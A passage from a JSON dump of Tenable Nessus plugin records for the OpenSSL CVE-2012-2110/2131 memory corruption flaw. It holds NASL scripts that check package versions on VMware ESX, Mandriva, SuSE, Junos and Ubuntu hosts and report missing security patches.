JRE is updated to version 1.5.0_38, which addresses\n multiple security issues that existed in earlier releases of\n Oracle (Sun) JRE. \n\n Oracle has documented the CVE identifiers that are addressed\n in JRE 1.5.0_38 in the Oracle Java SE Critical Patch Update\n Advisory of October 2012. \n\nc. Update to ESX service console OpenSSL RPM \n\n The service console OpenSSL RPM is updated to version \n openssl-0.9.7a.33.28.i686 to resolve multiple security issues. \n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-2110 to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2013/000205.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Method Handle Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2013-02-21\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 3.5.0\", patch:\"ESX350-201302401-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201302401-SG\",\n patch_updates : make_list(\"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201301401-SG\",\n patch_updates : make_list(\"ESX410-201304401-SG\", \"ESX410-201307401-SG\", \"ESX410-201312401-SG\", \"ESX410-201404401-SG\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 3.5.0\", patch:\"ESXe350-201302401-I-SG\")) flag++;\nif (esx_check(ver:\"ESXi 3.5.0\", patch:\"ESXe350-201302403-C-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.0\",\n patch : \"ESXi400-201302401-SG\",\n patch_updates : make_list(\"ESXi400-201305401-SG\", \"ESXi400-201310401-SG\", \"ESXi400-201404401-SG\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.1\",\n patch : \"ESXi410-201301401-SG\",\n patch_updates : make_list(\"ESXi410-201304401-SG\", \"ESXi410-201307401-SG\", \"ESXi410-201312401-SG\", \"ESXi410-201404401-SG\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 5.0\", vib:\"VMware:tools-light:5.0.0-1.25.912577\")) flag++;\n\nif (esx_check(ver:\"ESXi 5.1\", vib:\"VMware:esx-base:5.1.0-0.8.911593\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:39:04", "description": "It was discovered that the fix for CVE-2012-2110 (MDVSA-2012:060) was not sufficient to correct the issue for OpenSSL 0.9.8.\n\nThe updated packages have been upgraded to the 0.9.8w version which is not vulnerable to this issue.", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : openssl0.9.8 (MDVSA-2012:064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:mandriva:linux:2010.1", "p-cpe:/a:mandriva:linux:lib64openssl0.9.8", "p-cpe:/a:mandriva:linux:libopenssl0.9.8"], "id": "MANDRIVA_MDVSA-2012-064.NASL", "href": "https://www.tenable.com/plugins/nessus/58865", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:064. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58865);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-2131\");\n script_bugtraq_id(53212);\n script_xref(name:\"MDVSA\", value:\"2012:064\");\n\n script_name(english:\"Mandriva Linux Security Advisory : openssl0.9.8 (MDVSA-2012:064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2012-2110 (MDVSA-2012:060) was\nnot sufficient to correct the issue for OpenSSL 0.9.8.\n\nThe updated packages have been upgraded to the 0.9.8w version which is\nnot vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20120424.txt\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected lib64openssl0.9.8 and / or libopenssl0.9.8\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64openssl0.9.8-0.9.8w-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libopenssl0.9.8-0.9.8w-0.1mdv2010.2\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:19:13", "description": "This update of openssl fixes an integer conversation issue which could cause a heap-based memory corruption. (CVE-2012-2110)\n\nAdditionally, a check for negative buffer length values was added (CVE-2012-2131) and the stack made non-executable by marking the enhanced Intel SSSE3 assembler code as not needing executable stack.", "cvss3": {}, "published": "2013-01-25T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : openssl (SAT Patch Number 6245)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8", "p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-32bit", "p-cpe:/a:novell:suse_linux:11:openssl", "p-cpe:/a:novell:suse_linux:11:openssl-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_LIBOPENSSL-DEVEL-120503.NASL", "href": "https://www.tenable.com/plugins/nessus/64184", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64184);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n\n script_name(english:\"SuSE 11.1 Security Update : openssl (SAT Patch Number 6245)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of openssl fixes an integer conversation issue which could\ncause a heap-based memory corruption. (CVE-2012-2110)\n\nAdditionally, a check for negative buffer length values was added\n(CVE-2012-2131) and the stack made non-executable by marking the\nenhanced Intel SSSE3 assembler code as not needing executable stack.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=755395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=758060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2110.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2131.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openssl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libopenssl0_9_8-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"openssl-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libopenssl0_9_8-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libopenssl0_9_8-32bit-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"openssl-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libopenssl0_9_8-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"openssl-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"openssl-doc-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libopenssl0_9_8-32bit-0.9.8j-0.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libopenssl0_9_8-32bit-0.9.8j-0.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:46:13", "description": "According to its self-reported version number, the remote Junos router is using an outdated version of OpenSSL. Parsing malformed ASN.1 encoded data can result in memory corruption. This vulnerability can be triggered by attempting to parse untrusted data (e.g., an X.509 certificate).", "cvss3": {}, "published": "2012-07-17T00:00:00", "type": "nessus", "title": "Juniper Junos OpenSSL ASN.1 Memory Corruption (PSN-2012-07-645)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_PSN-2012-07-645.NASL", "href": "https://www.tenable.com/plugins/nessus/59989", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(59989);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_bugtraq_id(53158, 53212);\n script_xref(name:\"EDB-ID\", value:\"18756\");\n\n script_name(english:\"Juniper Junos OpenSSL ASN.1 Memory Corruption (PSN-2012-07-645)\");\n script_summary(english:\"Checks version & model\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote router has a memory corruption vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its self-reported version number, the remote Junos\nrouter is using an outdated version of OpenSSL. Parsing malformed\nASN.1 encoded data can result in memory corruption. This vulnerability\ncan be triggered by attempting to parse untrusted data (e.g., an X.509\ncertificate).\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2012/Apr/210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20120419.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20120424.txt\");\n # http://www.juniper.net/alerts/viewalert.jsp?actionBtn=Search&txtAlertNumber=PSN-2012-07-645&viewMode=view\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df5606ad\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the relevant Junos upgrade referenced in Juniper advisory\nPSN-2012-07-645.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/model\", \"Host/Juniper/JUNOS/Version\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"junos.inc\");\n\nfixes['10.4'] = '10.4S10';\nfixes['11.4'] = '11.4R4';\nfixes['12.1'] = '12.1R2';\n\nmodel = get_kb_item_or_exit('Host/Juniper/model');\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\ncheck_model(model:model, flags:ALL_ROUTERS, exit_on_fail:TRUE);\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\nif (report_verbosity > 0)\n{\n report = get_report(ver:ver, fix:fix, model:model);\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:50:26", "description": "This compat-openssl097g rollup update contains various security fixes :\n\n - incorrect integer conversions in OpenSSL could have resulted in memory corruption during buffer management operations. (CVE-2012-2131 / CVE-2012-2110)", "cvss3": {}, "published": "2012-09-12T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : compat-openssl097g (ZYPP Patch Number 8262)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_COMPAT-OPENSSL097G-8262.NASL", "href": "https://www.tenable.com/plugins/nessus/62060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62060);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n\n script_name(english:\"SuSE 10 Security Update : compat-openssl097g (ZYPP Patch Number 8262)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This compat-openssl097g rollup update contains various security \nfixes :\n\n - incorrect integer conversions in OpenSSL could have\n resulted in memory corruption during buffer management\n operations. (CVE-2012-2131 / CVE-2012-2110)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2110.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2131.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8262.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"compat-openssl097g-0.9.7g-13.23.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.23.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"compat-openssl097g-0.9.7g-13.23.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.23.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:39:34", "description": "It was discovered that the fix for CVE-2012-2110 was incomplete for OpenSSL 0.9.8. A remote attacker could trigger this flaw in services that used SSL to cause a denial of service or possibly execute arbitrary code with application privileges. Ubuntu 11.10 was not affected by this issue. (CVE-2012-2131)\n\nThe original upstream fix for CVE-2012-2110 would cause BUF_MEM_grow_clean() to sometimes return the wrong error condition.\nThis update fixes the problem.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : openssl vulnerability (USN-1428-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8", "p-cpe:/a:canonical:ubuntu_linux:libssl1.0.0", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1428-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1428-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58873);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_bugtraq_id(53212);\n script_xref(name:\"USN\", value:\"1428-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : openssl vulnerability (USN-1428-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the fix for CVE-2012-2110 was incomplete for\nOpenSSL 0.9.8. A remote attacker could trigger this flaw in services\nthat used SSL to cause a denial of service or possibly execute\narbitrary code with application privileges. Ubuntu 11.10 was not\naffected by this issue. (CVE-2012-2131)\n\nThe original upstream fix for CVE-2012-2110 would cause\nBUF_MEM_grow_clean() to sometimes return the wrong error condition.\nThis update fixes the problem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1428-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssl0.9.8 and / or libssl1.0.0 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 